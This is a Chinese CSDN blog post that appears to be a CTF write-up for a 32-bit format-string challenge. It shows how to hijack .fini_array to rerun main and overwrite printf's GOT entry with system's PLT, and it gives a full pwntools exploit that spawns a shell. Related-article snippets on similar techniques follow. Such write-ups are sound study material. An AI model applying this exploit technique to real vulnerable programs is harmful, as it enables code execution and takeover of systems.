Fmtstr_Loop

最新推荐文章于 2024-01-19 18:51:02 发布
最新推荐文章于 2024-01-19 18:51:02 发布
阅读量9.7k 收藏
点赞数
分类专栏: CTF Pwn
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/93380502
版权
Pwn 同时被 2 个专栏收录
28 篇文章 8 订阅
订阅专栏
CTF
22 篇文章 4 订阅
订阅专栏

前言

很多时候都是因为程序中存在循环,如果程序中不存在循环呢?在一些栈溢出中我们可以使用ROP技术劫持函数返回地址到start,同样我们可以使用格式化字符串漏洞做到这一点…

实例

题目:12届ciscn西南赛区半决赛

思路

虽然我们写代码的时候以main函数作为程序入口,但是编译成程序的时候入口并不是main函数,而是start代码段。事实上,start代码段还会调用__libc_start_main来做一些初始化工作,最后调用main函数并在main函数结束后做一些处理;
所以我们可以修改fini段来修改程序的执行流程…

这道题就是一个标准的格式化字符串漏洞,并且程序只可以执行一次:

sir@sir-PC:~/desktop/2$ ./pwn
Welcome to my ctf! What's your name?
aaaa,%x,%x,%x,%x,%x
Hello aaaa,ff82d830,2,0,61616161,252c7825

这道题我们的思路就是修改fini段,让程序可以执行多次,然后把printf_got的位置换为system_plt,当程序执行printf("/bin/sh;")就去执行system("/bin/sh;")了;

找要修改的fini的位置:

sir@sir-PC:~/desktop/2$ nm pwn | grep fini
0804979c t __do_global_dtors_aux_fini_array_entry
08048624 T _fini
08048620 T __libc_csu_fini

我们只要把0x0804979c这个位置的内容改为main函数的地址,程序在结束的时候就会执行main函数了;

sir@sir-PC:~/desktop/2$ nm pwn | grep main
         U __libc_start_main@@GLIBC_2.0
08048534 T main

sir@sir-PC:~/desktop/2$ objdump -R pwn

pwn:     文件格式 elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
0804988c R_386_GLOB_DAT    __gmon_start__
080498c0 R_386_COPY        stdin@@GLIBC_2.0
080498c4 R_386_COPY        stdout@@GLIBC_2.0
0804989c R_386_JUMP_SLOT   printf@GLIBC_2.0
080498a0 R_386_JUMP_SLOT   puts@GLIBC_2.0
080498a4 R_386_JUMP_SLOT   system@GLIBC_2.0
080498a8 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0
080498ac R_386_JUMP_SLOT   setvbuf@GLIBC_2.0
080498b0 R_386_JUMP_SLOT   __isoc99_scanf@GLIBC_2.7

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './2/pwn'
p = process(name)

if args.G:
    gdb.attach(p)

main_addr = 0x8048534
fini_addr = 0x804979c
system_plt_addr = 0x80483d0
printf_got_addr = 0x804989c
# 第一次执行程序
p.recvuntil("Welcome to my ctf! What's your name?\n")
pay = p32(0x804979c) + p32(0x804979c+2)  + p32(0x804989c) + p32(0x804989c+2) + '%34084c%4$hn' + '%33488c%5$hn' + '%31692c%6$hn' + '%33844c%7$hn'
p.sendline(pay)
# 第二次执行程序
p.recvuntil("Welcome to my ctf! What's your name?\n")
p.sendline('/bin/sh;')
p.interactive()
钞sir
关注
专栏目录
time_formatter-UAF利用
Vicl1fe的博客
10-12 235
time_formatter-UAF利用 版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/qq_39268483/article/details/91552363
CTF pwn题之格式化字符串漏洞详解
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
fmtstr1
m0_49959202的博客
09-18 248
文章目录fmtstr11.程序分析2.exp编写 fmtstr1 1.程序分析 file一下: checksec一下: ida分析一下,发现存在printf(&buf),这里有格式化字符串漏洞,可以进行利用 发现如果x是4的话,就能够获取到shell,但是在数据段内x的值为3: 因此,需要利用格式化字符串利用,将x的值从3修改为4。 使用gdb进行调试,在printf处设置断点。 输入"%d%d", 当进入printf(&buf)时,查看栈内变量,发现"%d%d"是格式化字符串的第1
SysUtils.FmtStr、SysUtils.Format - 格式化输出
weixin_34095889的博客
03-31 107
FmtStr 是个过程, 它是用第一个参数来返回结果的; Format 是个函数, 返回值就是格式后的结果. 举例: var str: string; begin FmtStr(str, '最大整数是: %d', [MaxInt]); ShowMessage(str); {最大整数是: 2147483647} ...
pwntools中fmtstr的使用
fa1c4的blog
02-01 4000
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
CTF-Wiki pwn fmtstr(格式化字符串漏洞)
mumuzi的博客
07-24 924
https://www.yinxiang.com/everhub/note/f07ff198-5072-4014-b110-21fb833affee –原理 –格式化字符串 –程序崩溃 –泄漏内存 –泄漏栈内存 –泄漏任意地址内存:覆盖小数字、覆盖大数字 –例题1:x64格式化字符串漏洞 –例题2:hijack GOT 劫持GOT表 –例题3:hijack retaddr 劫持返回地址 –盲打 笔记若存在逻辑问题或者原则性问题,恳请在评论区指正,谢谢观看笔记的师傅。之后会出一期萌新常见的问题(主要只是为了自
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6599
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
fmtstr_payload
最新发布
04-15
fmtstr_payload是pwntools库中的一个工具函数,用于简化构造格式化字符串漏洞的payload。它的语法如下: ```python fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') ``` - offset:表示格式化...
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1160
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串。
三个白帽 pwnme - k0 [fmtstr] - [Hijack RetAddr]
ACdream
02-27 1073
程序运行起来功能很简单:输入用户名密码、输出用户名密码、退出 运行起来发现:这里可能会有个缓冲区溢出的漏洞,在输入用户名时可以超过20个,超过的部分成了密码 进一步测试发现,该程序存在fmtstr漏洞 在程序4008A6处提供了system("/bin/sh"),所以我们的思路是,劫持某个函数返回地址到这儿即可 先来计算偏移: 在这里下断 Breakpoi...
Pwn 学习 fmt_str_level_1_x64 格式化字符串
MrTreebook的博客
09-10 364
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hn写。fmtstr payload函数返回的就是payload。pwntools工具: fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’)第二个参数表示需要利用&n写入的数据, 采用字典形式,格式目标地址:准备修改的值}第三个参数表示已经输出的字符个数, 这里没有, 为0, 采用默认值即可;
[PWN]——格式化字符串漏洞(包含几种解题方法)
ysy___ysy的博客
01-19 2563
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便做题。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
__fini_array劫持
qq_36495104的博客
08-30 1121
3×17-x64静态编译程序的fini_array劫持 参考 pwnable.tw新手向write up(二) 3×17-x64静态编译程序的fini_array劫持 pwnable.tw 3x17 1 劫持fini_array,循环写 劫持fini_array[1]为main函数地址,fini_array[0]为__libc_csu_fini,将长度为18的任意地址写升级为长度无限制的任意地址写 2 栈迁移,构造ROP chain 在0x4b40f0+0x10地址处构造ROP chain ROP ch
pwn 学习笔记 格式化串计算偏移量
SsMing的博客
08-15 4939
学习参照:https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit/ 利用%s泄露libc函数的got表内容 addr%k$s可以用来泄露指定地址的内容,但要先确定k的值,可控制的格式化字符串参数是函数第几个参数(k+1),减一就是格式化字符串的第几个参数(k)。 利用  [tag]%p%p%p%p%p%p%p%p%p%p来确...
Linux下pwn从入门到放弃
热门推荐
一个码农的笔记
12-15 1万+
0x0 简介 pwn,在安全领域中指的是通过二进制/系统调用等方式获得目标主机的shell。 虽然web系统在互联网中占有比较大的分量,但是随着移动端,ioT的逐渐流行,传统的缓冲区溢出又一次有了用武之处 0x01 工欲善其事,必先利其器 Linux下的pwn常用到的工具有: (1)gdb:Linux调试中必要用到的 (2)gdb-peda:gdb方便调试的工具,类似的工具有gef,gd
2019.11.3 unctf babyfmt (格式化字符串任意地址的读和写)
DSR446的博客
11-03 1735
i春秋的一篇关于格式化字符串文章把任意地址的读和写讲的很清晰: https://bbs.ichunqiu.com/thread-43624-1-1.html 方法一:先输入一个 %p 泄露出数组的首地址,再retn处下个断点,用返回地址减去数组的首地址,计算出他们之间的相对偏移。因为栈的地址每次都是变化的,所以我们每次都要泄露栈的地址,然后计算出返回地址。 重要的步骤就是利用fmtstr_pa...
ciscn_2019_sw_1(fmt改fini_array无限循环)
wuyvle的博客
04-30 1450
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值